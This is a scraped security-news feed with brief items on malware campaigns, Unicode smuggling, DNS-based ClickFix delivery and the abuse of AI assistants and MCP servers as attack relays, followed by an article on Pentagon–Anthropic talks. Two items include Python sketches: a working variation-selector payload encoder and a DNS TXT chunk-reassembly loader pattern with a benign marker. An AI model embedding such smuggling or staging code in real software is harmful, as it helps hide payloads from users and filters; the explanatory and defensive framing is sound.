-
Cybersecurity researchers have disclosed details of a new campaign dubbed CRESCENTHARVEST, likely targeting supporters of Iran’s ongoing protests to conduct information theft and long-term espionage. The Acronis Threat Research Unit (TRU) said it observed the activity after January 9, with the attacks designed to deliver a malicious payload that serves as a remote access trojan (RAT) and […]
-
Hackers are increasingly abusing emoji and other Unicode tricks to hide malicious code, bypass filters, and evade modern security controls, including AI-powered defenses. This emerging technique, known as emoji or Unicode smuggling, turns harmless-looking characters into stealth carriers for commands, data, and exploit payloads. Emoji smuggling is an obfuscation technique in which attackers encode malicious content using […]
The post Hackers Hide Malware in Emoji-Based Code to Bypass Security Defenses appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
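The encoding trick behind Unicode smuggling can be illustrated with a short, benign sketch. One commonly reported variant hides arbitrary bytes in invisible variation selectors (U+FE00–U+FE0F and U+E0100–U+E01EF) appended to a visible emoji, so the text renders as a single harmless character while carrying a hidden payload. The function names and byte mapping below are illustrative, not the specific campaign's code:

```python
def encode_in_selectors(carrier: str, payload: bytes) -> str:
    """Append one invisible variation selector per payload byte to a carrier glyph."""
    out = [carrier]
    for b in payload:
        # Bytes 0x00-0x0F map to U+FE00..U+FE0F; 0x10-0xFF to U+E0100..U+E01EF.
        out.append(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16))
    return "".join(out)


def extract_hidden(text: str) -> bytes:
    """Recover bytes smuggled in variation selectors; ignore normal characters."""
    data = []
    for ch in text:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            data.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            data.append(cp - 0xE0100 + 16)
    return bytes(data)


smuggled = encode_in_selectors("😀", b"hidden command")
print(smuggled == "😀")        # renders as just the emoji? False: invisible selectors follow
print(extract_hidden(smuggled))  # b'hidden command'
```

Because variation selectors are valid, printable-looking Unicode, such strings often pass naive keyword filters and length-based heuristics even though the payload round-trips losslessly.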
-
Social engineering campaigns are becoming increasingly sophisticated, moving beyond simple phishing emails to more complex technical deceptions. The “ClickFix” tactic, which typically tricks users into copying and pasting malicious scripts to “fix” a fake browser error, has undergone significant evolution. Security researcher Muhammad Hassoub has observed attackers moving away from high-noise tools that trigger immediate […]
The post Hackers Abuse nslookup.exe in ClickFix Campaign to Deliver Malware via DNS appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
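The general pattern behind DNS-based delivery can be sketched without the campaign's actual infrastructure: a payload is split into base64 chunks published as TXT records under sequence-numbered subdomains, queried one by one with a living-off-the-land tool such as nslookup.exe, then reassembled and decoded on the victim. The domain, chunk layout, and payload below are hypothetical (the decoded string is a benign marker), and the lookup step is simulated with a dictionary rather than live queries:

```python
import base64

# Simulated TXT answers that a loader script might collect via successive
# "nslookup -type=TXT <n>.stage.example.com" queries; the domain and the
# index-prefixed naming scheme are illustrative assumptions.
txt_answers = {
    "0.stage.example.com": "Y2FsYy",
    "1.stage.example.com": "5leGU=",
}

# Reassemble the chunks in sequence order, then base64-decode the result.
ordered = sorted(txt_answers, key=lambda name: int(name.split(".")[0]))
command = base64.b64decode("".join(txt_answers[n] for n in ordered))
print(command)  # b'calc.exe'
```

From a defender's perspective, the same reassembly logic is useful for triaging packet captures: bursts of TXT queries to sequential subdomains whose answers only decode cleanly when concatenated are a strong indicator of this delivery pattern.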
-
Cryptojacking, the unauthorized use of a victim’s computing resources to mine cryptocurrency, has transitioned from a browser-based nuisance (typified by Coinhive scripts) to a system-level threat utilizing advanced malware techniques. The infection chain starts with a familiar lure: cracked “premium” productivity suites distributed via pirated software bundles, where the user executes what appears to be […]
The post Stealthy Crypto-Mining Malware Jumps Air-Gaps, Spreads via External Drives appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
OpenAI has collaborated with crypto investment firm Paradigm to release EVMbench, a new benchmark designed to evaluate how artificial intelligence agents interact with smart contract security. As smart contracts currently secure over $100 billion in open-source crypto assets, the ability of AI to successfully read, write, and audit code is becoming a critical component of […]
The post OpenAI Launches EVMbench: A New Framework to Detect and Exploit Blockchain Vulnerabilities appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
DigitStealer’s expanding command-and-control (C2) footprint is exposing more of its backend than its operators likely intended, giving defenders fresh opportunities to track and block new infrastructure linked to the macOS‑targeting infostealer. Unlike many popular stealers, it does not expose a web panel for affiliates, strongly suggesting a closed operation rather than a broad malware‑as‑a‑service (MaaS) offering. […]
The post Researchers Expose DigitStealer C2 Infrastructure Targeting macOS Users appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
Researchers at Check Point Research (CPR) have uncovered a novel technique where cybercriminals utilize popular AI platforms like Grok and Microsoft Copilot to orchestrate covert attacks. This method transforms benign AI web services into proxies for Command and Control (C2) communication. By leveraging the web browsing and URL-fetching capabilities of these assistants, attackers can tunnel […]
The post New Threat Emerges as Attackers Leverage Grok and Copilot to Evade Security Monitoring appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
MCP servers can silently turn AI assistants into powerful attack platforms, enabling arbitrary code execution, large‑scale data exfiltration, and stealthy user manipulation across both local machines and cloud environments. New research and recent real‑world incidents show that this emerging ecosystem is already being abused in the wild, including a malicious Postmark MCP server that quietly […]
The post Critical MCP Server Enables Arbitrary Code Execution and Sensitive Data Exfiltration appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
A security flaw in Microsoft 365 Copilot is currently causing the AI assistant to incorrectly summarize email messages protected by confidentiality sensitivity labels, essentially bypassing configured Data Loss Prevention (DLP) policies. This vulnerability exposes potentially sensitive organizational data to unauthorized AI processing. The issue, tracked under Microsoft reference CW1226324, was first flagged on February 4, […]
The post Microsoft 365 Copilot Vulnerability Exposes Sensitive Emails Through AI Summaries appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
-
PALM BEACH, Fla.—After weeks of back-and-forth with AI company Anthropic, the Pentagon is actively talking with all four major U.S. AI players—Anthropic, OpenAI, Google, and xAI—to ensure the companies and the Defense Department are at "the same baseline" regarding Pentagon expectations, the undersecretary of defense for research and engineering said Tuesday.
“We actually signed contracts with all four of them over the summer without a lot of specificity,” Emil Michael told a group of venture capital investors during an Amazon Web Services event. “Now we want to deploy [them] on our system so other people can build agents and pilots, and deploy it,” he said.
In other words, after months of exercises and experiments, the Pentagon is looking to allow different command elements and business entities to build AI agents that can perform a wider variety of tasks with minimal human oversight.
The discussions between Anthropic and the Pentagon have grown increasingly tense. Sources inside the company told Reuters the Defense Department was pushing to use Anthropic’s AI models for domestic surveillance and autonomous weapons targeting, and Axios reported the Pentagon is “close” to cutting ties with the company over Anthropic’s refusal to give the Pentagon unrestricted access to its models. Some Pentagon officials, speaking anonymously, have even vowed to make Anthropic “pay a price” for its perceived lack of cooperation.
Anthropic, which is heavily backed by AWS, is “having productive conversations, in good faith” with the Pentagon, according to a company spokesperson.
Michael struck a far more conciliatory note than other Pentagon officials who have spoken on the spat, and appeared at the event beside AWS Vice President of Worldwide Public Sector Dave Levy.
However, Michael did not move from the Pentagon’s red line. “We want all four of them,” he said, describing OpenAI, Google, xAI, and Anthropic as America’s “AI champions” with the financial staying power for long-term partnership.
Still, Michael noted there are a wide variety of roles the companies might be able to play, and the Pentagon wants different business and command elements to determine what to do with the models, rather than have the companies tell the military what they can and cannot do.
“We're wanting all four companies to hear the same principle, which is: we have to be able to use any model for all lawful use cases.”
Of the four companies the Pentagon has contracted with, Michael said Anthropic is the only holdout on the issue of their ethical safeguards versus the Pentagon’s.
“Some of these companies have sort of different philosophies about what they want it to be used for or not, but they’re selling to the Department of War. We do Department of War-like things.”
The Pentagon’s own safety or ethical safeguards must overrule company safeguards, he said. He described an “extremely dangerous” hypothetical in which the U.S. military could be using an AI agent that suddenly stopped functioning due to embedded company safeguards. “That’s a risk I cannot take.”
The Pentagon has its own safeguards, a list of ethical principles enacted during the first Trump administration that governs everything from development to testing to deployment of AI systems. While the Pentagon’s newest AI acceleration strategy questions the very meaning of “responsible AI,” Michael said adherence to the AI ethics principles is still very much in place.
“The good news/bad news about a hierarchical department is when there's a set of secretary-validated guidance directive memos that lays out the policies and procedures, people follow them. So that's not an issue.”


